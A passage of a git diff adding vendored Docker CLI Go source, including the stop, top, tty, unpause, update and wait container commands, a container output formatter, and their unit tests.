+ tx += float64(v.TxBytes) + } + return rx, tx +} diff --git a/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go b/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go new file mode 100644 index 0000000000..828d634c8a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go @@ -0,0 +1,20 @@ +package container + +import ( + "testing" + + "github.com/docker/docker/api/types" +) + +func TestCalculateBlockIO(t *testing.T) { + blkio := types.BlkioStats{ + IoServiceBytesRecursive: []types.BlkioStatEntry{{8, 0, "read", 1234}, {8, 1, "read", 4567}, {8, 0, "write", 123}, {8, 1, "write", 456}}, + } + blkRead, blkWrite := calculateBlockIO(blkio) + if blkRead != 5801 { + t.Fatalf("blkRead = %d, want 5801", blkRead) + } + if blkWrite != 579 { + t.Fatalf("blkWrite = %d, want 579", blkWrite) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/container/stop.go b/vendor/github.com/docker/docker/cli/command/container/stop.go new file mode 100644 index 0000000000..c68ede5368 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/stop.go @@ -0,0 +1,67 @@ +package container + +import ( + "fmt" + "strings" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type stopOptions struct { + time int + timeChanged bool + + containers []string +} + +// NewStopCommand creates a new cobra.Command for `docker stop` +func NewStopCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts stopOptions + + cmd := &cobra.Command{ + Use: "stop [OPTIONS] CONTAINER [CONTAINER...]", + Short: "Stop one or more running containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + opts.timeChanged = cmd.Flags().Changed("time") + return runStop(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.IntVarP(&opts.time, "time", "t", 10, "Seconds to wait for stop before killing it") + return cmd +} + +func runStop(dockerCli *command.DockerCli, opts *stopOptions) error { + ctx := context.Background() + + var timeout *time.Duration + if opts.timeChanged { + timeoutValue := time.Duration(opts.time) * time.Second + timeout = &timeoutValue + } + + var errs []string + + errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, id string) error { + return dockerCli.Client().ContainerStop(ctx, id, timeout) + }) + for _, container := range opts.containers { + if err := <-errChan; err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", container) + } + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/top.go b/vendor/github.com/docker/docker/cli/command/container/top.go new file mode 100644 index 0000000000..160153ba7f --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/top.go @@ -0,0 +1,58 @@ +package container + +import ( + "fmt" + "strings" + "text/tabwriter" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type topOptions struct { + container string + + args []string +} + +// NewTopCommand creates a new cobra.Command for `docker top` +func NewTopCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts topOptions + + cmd := &cobra.Command{ + Use: "top CONTAINER [ps OPTIONS]", + Short: "Display the running processes of a container", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.container = args[0] + opts.args = args[1:] + return runTop(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.SetInterspersed(false) + + return cmd +} + +func runTop(dockerCli *command.DockerCli, opts *topOptions) error { + ctx := context.Background() + + procList, err := dockerCli.Client().ContainerTop(ctx, opts.container, opts.args) + if err != nil { + return err + } + + w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0) + fmt.Fprintln(w, strings.Join(procList.Titles, "\t")) + + for _, proc := range procList.Processes { + fmt.Fprintln(w, strings.Join(proc, "\t")) + } + w.Flush() + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/tty.go b/vendor/github.com/docker/docker/cli/command/container/tty.go new file mode 100644 index 0000000000..6af8e2becf --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/tty.go @@ -0,0 +1,103 @@ +package container + +import ( + "fmt" + "os" + gosignal "os/signal" + "runtime" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/signal" + "golang.org/x/net/context" +) + +// resizeTtyTo resizes tty to specific height and width +func resizeTtyTo(ctx context.Context, client client.ContainerAPIClient, id string, height, width uint, isExec bool) { + if height == 0 && width == 0 { + return + } + + options := types.ResizeOptions{ + Height: height, + Width: width, + } + + var err error + if isExec { + err = client.ContainerExecResize(ctx, id, options) + } else { + err = client.ContainerResize(ctx, id, options) + } + + if err != nil { + logrus.Debugf("Error resize: %s", err) + } +} + +// MonitorTtySize updates the container tty size when the terminal tty changes size +func MonitorTtySize(ctx context.Context, cli *command.DockerCli, id string, isExec bool) error { + resizeTty := func() { + height, width := cli.Out().GetTtySize() + resizeTtyTo(ctx, cli.Client(), id, height, width, isExec) + } + + resizeTty() + + if runtime.GOOS == "windows" { + go func() { + prevH, prevW := cli.Out().GetTtySize() + for { + time.Sleep(time.Millisecond * 250) + h, w := cli.Out().GetTtySize() + + if prevW != w || prevH != h { + resizeTty() + } + prevH = h + prevW = w + } + }() + } else { + sigchan := make(chan os.Signal, 1) + gosignal.Notify(sigchan, signal.SIGWINCH) + go func() { + for range sigchan { + resizeTty() + } + }() + } + return nil +} + +// ForwardAllSignals forwards signals to the container +func ForwardAllSignals(ctx context.Context, cli *command.DockerCli, cid string) chan os.Signal { + sigc := make(chan os.Signal, 128) + signal.CatchAll(sigc) + go func() { + for s := range sigc { + if s == signal.SIGCHLD || s == signal.SIGPIPE { + continue + } + var sig string + for sigStr, sigN := range signal.SignalMap { + if sigN == s { + sig = sigStr + break + } + } + if sig == "" { + fmt.Fprintf(cli.Err(), "Unsupported signal: %v. Discarding.\n", s) + continue + } + + if err := cli.Client().ContainerKill(ctx, cid, sig); err != nil { + logrus.Debugf("Error sending signal: %s", err) + } + } + }() + return sigc +} diff --git a/vendor/github.com/docker/docker/cli/command/container/unpause.go b/vendor/github.com/docker/docker/cli/command/container/unpause.go new file mode 100644 index 0000000000..c4d8d4841e --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/unpause.go @@ -0,0 +1,50 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type unpauseOptions struct { + containers []string +} + +// NewUnpauseCommand creates a new cobra.Command for `docker unpause` +func NewUnpauseCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts unpauseOptions + + cmd := &cobra.Command{ + Use: "unpause CONTAINER [CONTAINER...]", + Short: "Unpause all processes within one or more containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + return runUnpause(dockerCli, &opts) + }, + } + return cmd +} + +func runUnpause(dockerCli *command.DockerCli, opts *unpauseOptions) error { + ctx := context.Background() + + var errs []string + errChan := parallelOperation(ctx, opts.containers, dockerCli.Client().ContainerUnpause) + for _, container := range opts.containers { + if err := <-errChan; err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", container) + } + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/update.go b/vendor/github.com/docker/docker/cli/command/container/update.go new file mode 100644 index 0000000000..75765856c5 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/update.go @@ -0,0 +1,163 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type updateOptions struct { + blkioWeight uint16 + cpuPeriod int64 + cpuQuota int64 + cpuRealtimePeriod int64 + cpuRealtimeRuntime int64 + cpusetCpus string + cpusetMems string + cpuShares int64 + memoryString string + memoryReservation string + memorySwap string + kernelMemory string + restartPolicy string + + nFlag int + + containers []string +} + +// NewUpdateCommand creates a new cobra.Command for `docker update` +func NewUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts updateOptions + + cmd := &cobra.Command{ + Use: "update [OPTIONS] CONTAINER [CONTAINER...]", + Short: "Update configuration of one or more containers", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + opts.nFlag = cmd.Flags().NFlag() + return runUpdate(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.Uint16Var(&opts.blkioWeight, "blkio-weight", 0, "Block IO (relative weight), between 10 and 1000, or 0 to disable (default 0)") + flags.Int64Var(&opts.cpuPeriod, "cpu-period", 0, "Limit CPU CFS (Completely Fair Scheduler) period") + flags.Int64Var(&opts.cpuQuota, "cpu-quota", 0, "Limit CPU CFS (Completely Fair Scheduler) quota") + flags.Int64Var(&opts.cpuRealtimePeriod, "cpu-rt-period", 0, "Limit the CPU real-time period in microseconds") + flags.Int64Var(&opts.cpuRealtimeRuntime, "cpu-rt-runtime", 0, "Limit the CPU real-time runtime in microseconds") + flags.StringVar(&opts.cpusetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)") + flags.StringVar(&opts.cpusetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)") + flags.Int64VarP(&opts.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)") + flags.StringVarP(&opts.memoryString, "memory", "m", "", "Memory limit") + flags.StringVar(&opts.memoryReservation, "memory-reservation", "", "Memory soft limit") + flags.StringVar(&opts.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap") + flags.StringVar(&opts.kernelMemory, "kernel-memory", "", "Kernel memory limit") + flags.StringVar(&opts.restartPolicy, "restart", "", "Restart policy to apply when a container exits") + + return cmd +} + +func runUpdate(dockerCli *command.DockerCli, opts *updateOptions) error { + var err error + + if opts.nFlag == 0 { + return fmt.Errorf("You must provide one or more flags when using this command.") + } + + var memory int64 + if opts.memoryString != "" { + memory, err = units.RAMInBytes(opts.memoryString) + if err != nil { + return err + } + } + + var memoryReservation int64 + if opts.memoryReservation != "" { + memoryReservation, err = units.RAMInBytes(opts.memoryReservation) + if err != nil { + return err + } + } + + var memorySwap int64 + if opts.memorySwap != "" { + if opts.memorySwap == "-1" { + memorySwap = -1 + } else { + memorySwap, err = units.RAMInBytes(opts.memorySwap) + if err != nil { + return err + } + } + } + + var kernelMemory int64 + if opts.kernelMemory != "" { + kernelMemory, err = units.RAMInBytes(opts.kernelMemory) + if err != nil { + return err + } + } + + var restartPolicy containertypes.RestartPolicy + if opts.restartPolicy != "" { + restartPolicy, err = runconfigopts.ParseRestartPolicy(opts.restartPolicy) + if err != nil { + return err + } + } + + resources := containertypes.Resources{ + BlkioWeight: opts.blkioWeight, + CpusetCpus: opts.cpusetCpus, + CpusetMems: opts.cpusetMems, + CPUShares: opts.cpuShares, + Memory: memory, + MemoryReservation: memoryReservation, + MemorySwap: memorySwap, + KernelMemory: kernelMemory, + CPUPeriod: opts.cpuPeriod, + CPUQuota: opts.cpuQuota, + CPURealtimePeriod: opts.cpuRealtimePeriod, + CPURealtimeRuntime: opts.cpuRealtimeRuntime, + } + + updateConfig := containertypes.UpdateConfig{ + Resources: resources, + RestartPolicy: restartPolicy, + } + + ctx := context.Background() + + var ( + warns []string + errs []string + ) + for _, container := range opts.containers { + r, err := dockerCli.Client().ContainerUpdate(ctx, container, updateConfig) + if err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%s\n", container) + } + warns = append(warns, r.Warnings...) + } + if len(warns) > 0 { + fmt.Fprintf(dockerCli.Out(), "%s", strings.Join(warns, "\n")) + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/container/utils.go b/vendor/github.com/docker/docker/cli/command/container/utils.go new file mode 100644 index 0000000000..6bef92463c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/utils.go @@ -0,0 +1,143 @@ +package container + +import ( + "strconv" + + "golang.org/x/net/context" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/cli/command" + clientapi "github.com/docker/docker/client" +) + +func waitExitOrRemoved(ctx context.Context, dockerCli *command.DockerCli, containerID string, waitRemove bool) chan int { + if len(containerID) == 0 { + // containerID can never be empty + panic("Internal Error: waitExitOrRemoved needs a containerID as parameter") + } + + var removeErr error + statusChan := make(chan int) + exitCode := 125 + + // Get events via Events API + f := filters.NewArgs() + f.Add("type", "container") + f.Add("container", containerID) + options := types.EventsOptions{ + Filters: f, + } + eventCtx, cancel := context.WithCancel(ctx) + eventq, errq := dockerCli.Client().Events(eventCtx, options) + + eventProcessor := func(e events.Message) bool { + stopProcessing := false + switch e.Status { + case "die": + if v, ok := e.Actor.Attributes["exitCode"]; ok { + code, cerr := strconv.Atoi(v) + if cerr != nil { + logrus.Errorf("failed to convert exitcode '%q' to int: %v", v, cerr) + } else { + exitCode = code + } + } + if !waitRemove { + stopProcessing = true + } else { + // If we are talking to an older daemon, `AutoRemove` is not supported. + // We need to fall back to the old behavior, which is client-side removal + if versions.LessThan(dockerCli.Client().ClientVersion(), "1.25") { + go func() { + removeErr = dockerCli.Client().ContainerRemove(ctx, containerID, types.ContainerRemoveOptions{RemoveVolumes: true}) + if removeErr != nil { + logrus.Errorf("error removing container: %v", removeErr) + cancel() // cancel the event Q + } + }() + } + } + case "detach": + exitCode = 0 + stopProcessing = true + case "destroy": + stopProcessing = true + } + return stopProcessing + } + + go func() { + defer func() { + statusChan <- exitCode // must always send an exit code or the caller will block + cancel() + }() + + for { + select { + case <-eventCtx.Done(): + if removeErr != nil { + return + } + case evt := <-eventq: + if eventProcessor(evt) { + return + } + case err := <-errq: + logrus.Errorf("error getting events from daemon: %v", err) + return + } + } + }() + + return statusChan +} + +// getExitCode performs an inspect on the container. It returns +// the running state and the exit code. +func getExitCode(ctx context.Context, dockerCli *command.DockerCli, containerID string) (bool, int, error) { + c, err := dockerCli.Client().ContainerInspect(ctx, containerID) + if err != nil { + // If we can't connect, then the daemon probably died. + if !clientapi.IsErrConnectionFailed(err) { + return false, -1, err + } + return false, -1, nil + } + return c.State.Running, c.State.ExitCode, nil +} + +func parallelOperation(ctx context.Context, containers []string, op func(ctx context.Context, container string) error) chan error { + if len(containers) == 0 { + return nil + } + const defaultParallel int = 50 + sem := make(chan struct{}, defaultParallel) + errChan := make(chan error) + + // make sure result is printed in correct order + output := map[string]chan error{} + for _, c := range containers { + output[c] = make(chan error, 1) + } + go func() { + for _, c := range containers { + err := <-output[c] + errChan <- err + } + }() + + go func() { + for _, c := range containers { + sem <- struct{}{} // Wait for active queue sem to drain. + go func(container string) { + output[container] <- op(ctx, container) + <-sem + }(c) + } + }() + return errChan +} diff --git a/vendor/github.com/docker/docker/cli/command/container/wait.go b/vendor/github.com/docker/docker/cli/command/container/wait.go new file mode 100644 index 0000000000..19ccf7ac25 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/container/wait.go @@ -0,0 +1,50 @@ +package container + +import ( + "fmt" + "strings" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type waitOptions struct { + containers []string +} + +// NewWaitCommand creates a new cobra.Command for `docker wait` +func NewWaitCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts waitOptions + + cmd := &cobra.Command{ + Use: "wait CONTAINER [CONTAINER...]", + Short: "Block until one or more containers stop, then print their exit codes", + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.containers = args + return runWait(dockerCli, &opts) + }, + } + return cmd +} + +func runWait(dockerCli *command.DockerCli, opts *waitOptions) error { + ctx := context.Background() + + var errs []string + for _, container := range opts.containers { + status, err := dockerCli.Client().ContainerWait(ctx, container) + if err != nil { + errs = append(errs, err.Error()) + } else { + fmt.Fprintf(dockerCli.Out(), "%d\n", status) + } + } + if len(errs) > 0 { + return fmt.Errorf("%s", strings.Join(errs, "\n")) + } + return nil +} diff --git a/vendor/github.com/docker/docker/cli/command/events_utils.go b/vendor/github.com/docker/docker/cli/command/events_utils.go new file mode 100644 index 0000000000..e710c97576 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/events_utils.go @@ -0,0 +1,49 @@ +package command + +import ( + "sync" + + "github.com/Sirupsen/logrus" + eventtypes "github.com/docker/docker/api/types/events" +) + +type eventProcessor func(eventtypes.Message, error) error + +// EventHandler is abstract interface for user to customize +// own handle functions of each type of events +type EventHandler interface { + Handle(action string, h func(eventtypes.Message)) + Watch(c <-chan eventtypes.Message) +} + +// InitEventHandler initializes and returns an EventHandler +func InitEventHandler() EventHandler { + return &eventHandler{handlers: make(map[string]func(eventtypes.Message))} +} + +type eventHandler struct { + handlers map[string]func(eventtypes.Message) + mu sync.Mutex +} + +func (w *eventHandler) Handle(action string, h func(eventtypes.Message)) { + w.mu.Lock() + w.handlers[action] = h + w.mu.Unlock() +} + +// Watch ranges over the passed in event chan and processes the events based on the +// handlers created for a given action. +// To stop watching, close the event chan. +func (w *eventHandler) Watch(c <-chan eventtypes.Message) { + for e := range c { + w.mu.Lock() + h, exists := w.handlers[e.Action] + w.mu.Unlock() + if !exists { + continue + } + logrus.Debugf("event handler: received event: %v", e) + go h(e) + } +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/container.go b/vendor/github.com/docker/docker/cli/command/formatter/container.go new file mode 100644 index 0000000000..6273453355 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/container.go @@ -0,0 +1,235 @@ +package formatter + +import ( + "fmt" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/stringutils" + units "github.com/docker/go-units" +) + +const ( + defaultContainerTableFormat = "table {{.ID}}\t{{.Image}}\t{{.Command}}\t{{.RunningFor}} ago\t{{.Status}}\t{{.Ports}}\t{{.Names}}" + + containerIDHeader = "CONTAINER ID" + namesHeader = "NAMES" + commandHeader = "COMMAND" + runningForHeader = "CREATED" + statusHeader = "STATUS" + portsHeader = "PORTS" + mountsHeader = "MOUNTS" + localVolumes = "LOCAL VOLUMES" + networksHeader = "NETWORKS" +) + +// NewContainerFormat returns a Format for rendering using a Context +func NewContainerFormat(source string, quiet bool, size bool) Format { + switch source { + case TableFormatKey: + if quiet { + return defaultQuietFormat + } + format := defaultContainerTableFormat + if size { + format += `\t{{.Size}}` + } + return Format(format) + case RawFormatKey: + if quiet { + return `container_id: {{.ID}}` + } + format := `container_id: {{.ID}} +image: {{.Image}} +command: {{.Command}} +created_at: {{.CreatedAt}} +status: {{- pad .Status 1 0}} +names: {{.Names}} +labels: {{- pad .Labels 1 0}} +ports: {{- pad .Ports 1 0}} +` + if size { + format += `size: {{.Size}}\n` + } + return Format(format) + } + return Format(source) +} + +// ContainerWrite renders the context for a list of containers +func ContainerWrite(ctx Context, containers []types.Container) error { + render := func(format func(subContext subContext) error) error { + for _, container := range containers { + err := format(&containerContext{trunc: ctx.Trunc, c: container}) + if err != nil { + return err + } + } + return nil + } + return ctx.Write(&containerContext{}, render) +} + +type containerContext struct { + HeaderContext + trunc bool + c types.Container +} + +func (c *containerContext) MarshalJSON() ([]byte, error) { + return marshalJSON(c) +} + +func (c *containerContext) ID() string { + c.AddHeader(containerIDHeader) + if c.trunc { + return stringid.TruncateID(c.c.ID) + } + return c.c.ID +} + +func (c *containerContext) Names() string { + c.AddHeader(namesHeader) + names := stripNamePrefix(c.c.Names) + if c.trunc { + for _, name := range names { + if len(strings.Split(name, "/")) == 1 { + names = []string{name} + break + } + } + } + return strings.Join(names, ",") +} + +func (c *containerContext) Image() string { + c.AddHeader(imageHeader) + if c.c.Image == "" { + return "" + } + if c.trunc { + if trunc := stringid.TruncateID(c.c.ImageID); trunc == stringid.TruncateID(c.c.Image) { + return trunc + } + } + return c.c.Image +} + +func (c *containerContext) Command() string { + c.AddHeader(commandHeader) + command := c.c.Command + if c.trunc { + command = stringutils.Ellipsis(command, 20) + } + return strconv.Quote(command) +} + +func (c *containerContext) CreatedAt() string { + c.AddHeader(createdAtHeader) + return time.Unix(int64(c.c.Created), 0).String() +} + +func (c *containerContext) RunningFor() string { + c.AddHeader(runningForHeader) + createdAt := time.Unix(int64(c.c.Created), 0) + return units.HumanDuration(time.Now().UTC().Sub(createdAt)) +} + +func (c *containerContext) Ports() string { + c.AddHeader(portsHeader) + return api.DisplayablePorts(c.c.Ports) +} + +func (c *containerContext) Status() string { + c.AddHeader(statusHeader) + return c.c.Status +} + +func (c *containerContext) Size() string { + c.AddHeader(sizeHeader) + srw := units.HumanSizeWithPrecision(float64(c.c.SizeRw), 3) + sv := units.HumanSizeWithPrecision(float64(c.c.SizeRootFs), 3) + + sf := srw + if c.c.SizeRootFs > 0 { + sf = fmt.Sprintf("%s (virtual %s)", srw, sv) + } + return sf +} + +func (c *containerContext) Labels() string { + c.AddHeader(labelsHeader) + if c.c.Labels == nil { + return "" + } + + var joinLabels []string + for k, v := range c.c.Labels { + joinLabels = append(joinLabels, fmt.Sprintf("%s=%s", k, v)) + } + return strings.Join(joinLabels, ",") +} + +func (c *containerContext) Label(name string) string { + n := strings.Split(name, ".") + r := strings.NewReplacer("-", " ", "_", " ") + h := r.Replace(n[len(n)-1]) + + c.AddHeader(h) + + if c.c.Labels == nil { + return "" + } + return c.c.Labels[name] +} + +func (c *containerContext) Mounts() string { + c.AddHeader(mountsHeader) + + var name string + var mounts []string + for _, m := range c.c.Mounts { + if m.Name == "" { + name = m.Source + } else { + name = m.Name + } + if c.trunc { + name = stringutils.Ellipsis(name, 15) + } + mounts = append(mounts, name) + } + return strings.Join(mounts, ",") +} + +func (c *containerContext) LocalVolumes() string { + c.AddHeader(localVolumes) + + count := 0 + for _, m := range c.c.Mounts { + if m.Driver == "local" { + count++ + } + } + + return fmt.Sprintf("%d", count) +} + +func (c *containerContext) Networks() string { + c.AddHeader(networksHeader) + + if c.c.NetworkSettings == nil { + return "" + } + + networks := []string{} + for k := range c.c.NetworkSettings.Networks { + networks = append(networks, k) + } + + return strings.Join(networks, ",") +} diff --git a/vendor/github.com/docker/docker/cli/command/formatter/container_test.go b/vendor/github.com/docker/docker/cli/command/formatter/container_test.go new file mode 100644 index 0000000000..16137897b9 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/formatter/container_test.go @@ -0,0 +1,398 @@ +package formatter + +import ( + "bytes" + "encoding/json" + "fmt" + "strings" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestContainerPsContext(t *testing.T) { + containerID := stringid.GenerateRandomID() + unix := time.Now().Add(-65 * time.Second).Unix() + + var ctx containerContext + cases := []struct { + container types.Container + trunc bool + expValue string + expHeader string + call func() string + }{ + {types.Container{ID: containerID}, true, stringid.TruncateID(containerID), containerIDHeader, ctx.ID}, + {types.Container{ID: containerID}, false, containerID, containerIDHeader, ctx.ID}, + {types.Container{Names: []string{"/foobar_baz"}}, true, "foobar_baz", namesHeader, ctx.Names}, + {types.Container{Image: "ubuntu"}, true, "ubuntu", imageHeader, ctx.Image}, + {types.Container{Image: "verylongimagename"}, true, "verylongimagename", imageHeader, ctx.Image}, + {types.Container{Image: "verylongimagename"}, false, "verylongimagename", imageHeader, ctx.Image}, + {types.Container{ + Image: "a5a665ff33eced1e0803148700880edab4", + ImageID: "a5a665ff33eced1e0803148700880edab4269067ed77e27737a708d0d293fbf5", + }, + true, + "a5a665ff33ec", + imageHeader, + ctx.Image, + }, + {types.Container{ + Image: "a5a665ff33eced1e0803148700880edab4", + ImageID: "a5a665ff33eced1e0803148700880edab4269067ed77e27737a708d0d293fbf5", + }, + false, + "a5a665ff33eced1e0803148700880edab4", + imageHeader, + ctx.Image, + }, + {types.Container{Image: ""}, true, "", imageHeader, ctx.Image}, + {types.Container{Command: "sh -c 'ls -la'"}, true, `"sh -c 'ls -la'"`, commandHeader, ctx.Command}, + {types.Container{Created: unix}, true, time.Unix(unix, 0).String(), createdAtHeader, ctx.CreatedAt}, + {types.Container{Ports: []types.Port{{PrivatePort: 8080, PublicPort: 8080, Type: "tcp"}}}, true, "8080/tcp", portsHeader, ctx.Ports}, + {types.Container{Status: "RUNNING"}, true, "RUNNING", statusHeader, ctx.Status}, + {types.Container{SizeRw: 10}, true, "10 B", sizeHeader, ctx.Size}, + {types.Container{SizeRw: 10, SizeRootFs: 20}, true, "10 B (virtual 20 B)", sizeHeader, ctx.Size}, + {types.Container{}, true, "", labelsHeader, ctx.Labels}, + {types.Container{Labels: map[string]string{"cpu": "6", "storage": "ssd"}}, true, "cpu=6,storage=ssd", labelsHeader, ctx.Labels}, + {types.Container{Created: unix}, true, "About a minute", runningForHeader, ctx.RunningFor}, + {types.Container{ + Mounts: []types.MountPoint{ + { + Name: "this-is-a-long-volume-name-and-will-be-truncated-if-trunc-is-set", + Driver: "local", + Source: "/a/path", + }, + }, + }, true, "this-is-a-lo...", mountsHeader, ctx.Mounts}, + {types.Container{ + Mounts: []types.MountPoint{ + { + Driver: "local", + Source: "/a/path", + }, + }, + }, false, "/a/path", mountsHeader, ctx.Mounts}, + {types.Container{ + Mounts: []types.MountPoint{ + { + Name: "733908409c91817de8e92b0096373245f329f19a88e2c849f02460e9b3d1c203", + Driver: "local", + Source: "/a/path", + }, + }, + }, false, "733908409c91817de8e92b0096373245f329f19a88e2c849f02460e9b3d1c203", mountsHeader, ctx.Mounts}, + } + + for _, c := range cases { + ctx = containerContext{c: c.container, trunc: c.trunc} + v := c.call() + if strings.Contains(v, ",") { + compareMultipleValues(t, v, c.expValue) + } else if v != c.expValue { + t.Fatalf("Expected %s, was %s\n", c.expValue, v) + } + + h := ctx.FullHeader() + if h != c.expHeader { + t.Fatalf("Expected %s, was %s\n", c.expHeader, h) + } + } + + c1 := types.Container{Labels: map[string]string{"com.docker.swarm.swarm-id": "33", "com.docker.swarm.node_name": "ubuntu"}} + ctx = containerContext{c: c1, trunc: true} + + sid := ctx.Label("com.docker.swarm.swarm-id") + node := ctx.Label("com.docker.swarm.node_name") + if sid != "33" { + t.Fatalf("Expected 33, was %s\n", sid) + } + + if node != "ubuntu" { + t.Fatalf("Expected ubuntu, was %s\n", node) + } + + h := ctx.FullHeader() + if h != "SWARM ID\tNODE NAME" { + t.Fatalf("Expected %s, was %s\n", "SWARM ID\tNODE NAME", h) + + } + + c2 := types.Container{} + ctx = containerContext{c: c2, trunc: true} + + label := ctx.Label("anything.really") + if label != "" { + t.Fatalf("Expected an empty string, was %s", label) + } + + ctx = containerContext{c: c2, trunc: true} + FullHeader := ctx.FullHeader() + if FullHeader != "" { + t.Fatalf("Expected FullHeader to be empty, was %s", FullHeader) + } + +} + +func TestContainerContextWrite(t *testing.T) { + unixTime := time.Now().AddDate(0, 0, -1).Unix() + expectedTime := time.Unix(unixTime, 0).String() + + cases := []struct { + context Context + expected string + }{ + // Errors + { + Context{Format: "{{InvalidFunction}}"}, + `Template parsing error: template: :1: function "InvalidFunction" not defined +`, + }, + { + Context{Format: "{{nil}}"}, + `Template parsing error: template: :1:2: executing "" at : nil is not a command +`, + }, + // Table Format + { + Context{Format: NewContainerFormat("table", false, true)}, + `CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES SIZE +containerID1 ubuntu "" 24 hours ago foobar_baz 0 B +containerID2 ubuntu "" 24 hours ago foobar_bar 0 B +`, + }, + { + Context{Format: NewContainerFormat("table", false, false)}, + `CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES +containerID1 ubuntu "" 24 hours ago foobar_baz +containerID2 ubuntu "" 24 hours ago foobar_bar +`, + }, + { + Context{Format: NewContainerFormat("table {{.Image}}", false, false)}, + "IMAGE\nubuntu\nubuntu\n", + }, + { + Context{Format: NewContainerFormat("table {{.Image}}", false, true)}, + "IMAGE\nubuntu\nubuntu\n", + }, + { + Context{Format: NewContainerFormat("table {{.Image}}", true, false)}, + "IMAGE\nubuntu\nubuntu\n", + }, + { + Context{Format: NewContainerFormat("table", true, false)}, + "containerID1\ncontainerID2\n", + }, + // Raw Format + { + Context{Format: NewContainerFormat("raw", false, false)}, + fmt.Sprintf(`container_id: containerID1 +image: ubuntu +command: "" +created_at: %s +status: +names: foobar_baz +labels: +ports: + +container_id: containerID2 +image: ubuntu +command: "" +created_at: %s +status: +names: foobar_bar +labels: +ports: + +`, expectedTime, expectedTime), + }, + { + Context{Format: NewContainerFormat("raw", false, true)}, + fmt.Sprintf(`container_id: containerID1 +image: ubuntu +command: "" +created_at: %s +status: +names: foobar_baz +labels: +ports: +size: 0 B + +container_id: containerID2 +image: ubuntu +command: "" +created_at: %s +status: +names: foobar_bar +labels: +ports: +size: 0 B + +`, expectedTime, expectedTime), + }, + { + Context{Format: NewContainerFormat("raw", true, false)}, + "container_id: containerID1\ncontainer_id: containerID2\n", + }, + // Custom Format + { + Context{Format: "{{.Image}}"}, + "ubuntu\nubuntu\n", + }, + { + Context{Format: NewContainerFormat("{{.Image}}", false, true)}, + 